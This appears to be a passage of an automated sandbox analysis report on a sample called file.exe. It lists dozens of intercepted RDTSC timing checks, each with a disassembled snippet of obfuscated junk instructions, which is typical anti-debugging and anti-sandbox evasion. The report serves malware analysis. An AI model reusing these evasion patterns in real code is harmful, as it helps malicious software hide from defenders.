Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50AA3 second address: 4C50AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edx, dword ptr [ebp+0Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FF248D534A3h 0x00000017 jmp 00007FF248D534A3h 0x0000001c popfd 0x0000001d mov ecx, 20ED594Fh 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50AEA second address: 4C50B5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pushfd 0x0000000d jmp 00007FF249520A33h 0x00000012 or esi, 2B5D1DBEh 0x00000018 jmp 00007FF249520A39h 0x0000001d popfd 0x0000001e pop esi 0x0000001f mov al, bh 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 mov esi, edi 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b call 00007FF249520A36h 0x00000030 pop esi 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50B5F second address: 4C50B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50B65 second address: 4C50B69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50B69 second address: 4C50BC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov cx, 281Dh 0x00000011 mov ah, 29h 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FF248D534A4h 0x0000001a xchg eax, ebx 0x0000001b jmp 00007FF248D534A0h 0x00000020 push dword ptr [ebp+14h] 0x00000023 jmp 00007FF248D534A0h 0x00000028 push dword ptr [ebp+10h] 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e movzx ecx, di 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50C15 second address: 4C50C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50C1B second address: 4C50C49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D534A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF248D534A0h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C50C49 second address: 4C50C58 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70023 second address: 4C70032 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70032 second address: 4C70038 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70038 second address: 4C7003C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C7003C second address: 4C70082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF249520A33h 0x00000012 xor ecx, 3CFF27DEh 0x00000018 jmp 00007FF249520A39h 0x0000001d popfd 0x0000001e mov eax, 2C257AA7h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60C7F second address: 4C60CE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF248D534A7h 0x00000009 xor ecx, 09EEC38Eh 0x0000000f jmp 00007FF248D534A9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FF248D534A0h 0x0000001b or ah, 00000008h 0x0000001e jmp 00007FF248D5349Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60CE4 second address: 4C60CEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60CEA second address: 4C60D32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF248D534A8h 0x00000009 add eax, 09E07B98h 0x0000000f jmp 00007FF248D5349Bh 0x00000014 popfd 0x00000015 mov cx, 0D4Fh 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF248D534A0h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60D32 second address: 4C60D44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C60D44 second address: 4C60D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FF248D534A7h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FF248D5349Bh 0x00000019 adc ah, 0000001Eh 0x0000001c jmp 00007FF248D534A9h 0x00000021 popfd 0x00000022 mov bh, ch 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0C84 second address: 4CE0CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FF249520A35h 0x0000000b and ecx, 29B23C06h 0x00000011 jmp 00007FF249520A31h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c pushad 0x0000001d push edx 0x0000001e pop eax 0x0000001f popad 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FF249520A31h 0x00000027 mov ebp, esp 0x00000029 jmp 00007FF249520A2Eh 0x0000002e pop ebp 0x0000002f pushad 0x00000030 push esi 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0CE8 second address: 4CE0CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0CF1 second address: 4CE0CF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE000C second address: 4CE0074 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF248D534A4h 0x00000008 xor ax, 9658h 0x0000000d jmp 00007FF248D5349Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ax, dx 0x0000001d pushfd 0x0000001e jmp 00007FF248D534A7h 0x00000023 or cl, FFFFFFCEh 0x00000026 jmp 00007FF248D534A9h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0074 second address: 4CE007A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0DF0 second address: 4CD0DF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0DF6 second address: 4CD0E15 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 705C9BC3h 0x00000008 movzx esi, dx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF249520A2Eh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0E15 second address: 4CD0E27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF248D5349Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CD0E27 second address: 4CD0E2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70318 second address: 4C70330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF248D534A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C70330 second address: 4C70371 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007FF249520A34h 0x00000012 movzx ecx, dx 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FF249520A33h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE02A4 second address: 4CE02AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE02AA second address: 4CE02D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FF249520A33h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE02D6 second address: 4CE0313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF248D5349Fh 0x00000009 xor ax, 5D2Eh 0x0000000e jmp 00007FF248D534A9h 0x00000013 popfd 0x00000014 mov ch, 43h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d push esi 0x0000001e pop edi 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0313 second address: 4CE0379 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF249520A32h 0x00000008 and ch, FFFFFFD8h 0x0000000b jmp 00007FF249520A2Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 movzx eax, di 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007FF249520A37h 0x00000021 adc ecx, 66BEF54Eh 0x00000027 jmp 00007FF249520A39h 0x0000002c popfd 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0379 second address: 4CE0396 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 movzx esi, dx 0x0000000b pop ebx 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FF248D5349Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE0396 second address: 4CE03A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03A5 second address: 4CE03AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03AB second address: 4CE03AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03AF second address: 4CE03D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF248D534A9h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03D7 second address: 4CE03DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03DB second address: 4CE03E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03E1 second address: 4CE03F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 mov edi, ecx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4CE03F4 second address: 4CE045D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FF248D534A1h 0x0000000b jmp 00007FF248D5349Bh 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push 9623E559h 0x00000019 pushad 0x0000001a mov ax, dx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushfd 0x00000020 jmp 00007FF248D534A7h 0x00000025 xor ecx, 5511358Eh 0x0000002b jmp 00007FF248D534A9h 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80747 second address: 4C8074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8074B second address: 4C8075E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8075E second address: 4C807D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF249520A2Ch 0x00000012 sbb eax, 786DE0E8h 0x00000018 jmp 00007FF249520A2Bh 0x0000001d popfd 0x0000001e jmp 00007FF249520A38h 0x00000023 popad 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007FF249520A30h 0x0000002b push 674933C3h 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C807D2 second address: 4C807DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx eax, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C807DA second address: 4C80851 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xor dword ptr [esp], 11B0F3DBh 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FF249520A36h 0x00000018 and al, 00000008h 0x0000001b jmp 00007FF249520A2Bh 0x00000020 popfd 0x00000021 mov si, 6E7Fh 0x00000025 popad 0x00000026 call 00007FF249520A29h 0x0000002b pushad 0x0000002c mov edx, ecx 0x0000002e popad 0x0000002f push eax 0x00000030 jmp 00007FF249520A38h 0x00000035 mov eax, dword ptr [esp+04h] 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FF249520A2Eh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80851 second address: 4C80889 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FF248D534A9h 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movzx esi, dx 0x0000001a movsx edx, cx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80889 second address: 4C808F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF249520A31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FF249520A33h 0x00000011 sub eax, 626775CEh 0x00000017 jmp 00007FF249520A39h 0x0000001c popfd 0x0000001d popad 0x0000001e mov eax, dword ptr fs:[00000000h] 0x00000024 jmp 00007FF249520A2Eh 0x00000029 nop 0x0000002a pushad 0x0000002b movsx edi, ax 0x0000002e popad 0x0000002f push eax 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C808F5 second address: 4C8091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF248D5349Eh 0x0000000a xor eax, 34D188A8h 0x00000010 jmp 00007FF248D5349Bh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C8091B second address: 4C80943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov edx, 30444216h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e jmp 00007FF249520A2Dh 0x00000013 sub esp, 1Ch 0x00000016 pushad 0x00000017 mov eax, 32516223h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80943 second address: 4C80947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80947 second address: 4C809B0 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push ecx 0x0000000b pushfd 0x0000000c jmp 00007FF249520A33h 0x00000011 xor cx, 63FEh 0x00000016 jmp 00007FF249520A39h 0x0000001b popfd 0x0000001c pop ecx 0x0000001d mov dh, C0h 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007FF249520A33h 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 mov eax, 4274684Bh 0x0000002d mov si, 3E27h 0x00000031 popad 0x00000032 xchg eax, esi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C809B0 second address: 4C809B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C809B6 second address: 4C809C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF249520A2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C809C7 second address: 4C809CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C809CB second address: 4C80A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF249520A2Ch 0x0000000e xchg eax, esi 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FF249520A2Eh 0x00000016 xor ah, FFFFFFE8h 0x00000019 jmp 00007FF249520A2Bh 0x0000001e popfd 0x0000001f mov ecx, 35F92EDFh 0x00000024 popad 0x00000025 xchg eax, edi 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80A0D second address: 4C80A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80A11 second address: 4C80A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80A15 second address: 4C80A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80A1B second address: 4C80A62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 64E337EBh 0x00000008 call 00007FF249520A30h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FF249520A2Dh 0x0000001b sbb si, BE66h 0x00000020 jmp 00007FF249520A31h 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80A62 second address: 4C80A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80A67 second address: 4C80A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80A6D second address: 4C80A71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80A71 second address: 4C80AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, edi 0x00000009 jmp 00007FF249520A35h 0x0000000e mov eax, dword ptr [76FBB370h] 0x00000013 pushad 0x00000014 mov ebx, esi 0x00000016 mov edi, esi 0x00000018 popad 0x00000019 xor dword ptr [ebp-08h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov bx, 49B2h 0x00000023 push ebx 0x00000024 pop eax 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80AA7 second address: 4C80AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80AAD second address: 4C80AFF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF249520A2Fh 0x00000012 xor ah, 0000005Eh 0x00000015 jmp 00007FF249520A39h 0x0000001a popfd 0x0000001b mov ah, 6Dh 0x0000001d popad 0x0000001e mov esi, ebx 0x00000020 popad 0x00000021 push ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FF249520A2Eh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80AFF second address: 4C80B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF248D5349Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80B0E second address: 4C80B14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80B14 second address: 4C80B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80B18 second address: 4C80B5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c pushad 0x0000000d movsx edx, ax 0x00000010 mov ax, 170Bh 0x00000014 popad 0x00000015 pushfd 0x00000016 jmp 00007FF249520A30h 0x0000001b jmp 00007FF249520A35h 0x00000020 popfd 0x00000021 popad 0x00000022 lea eax, dword ptr [ebp-10h] 0x00000025 pushad 0x00000026 pushad 0x00000027 movzx esi, dx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4C80B5F second address: 4C80BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FF248D534A5h 0x0000000b and cl, 00000066h 0x0000000e jmp 00007FF248D534A1h 0x00000013 popfd 0x00000014 popad 0x00000015 mov dword ptr fs:[00000000h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FF248D534A3h 0x00000024 and ch, FFFFFF9Eh 0x00000027 jmp 00007FF248D534A9h 0x0000002c popfd 0x0000002d push eax 0x0000002e pop ebx 0x0000002f popad 0x00000030 rdtsc
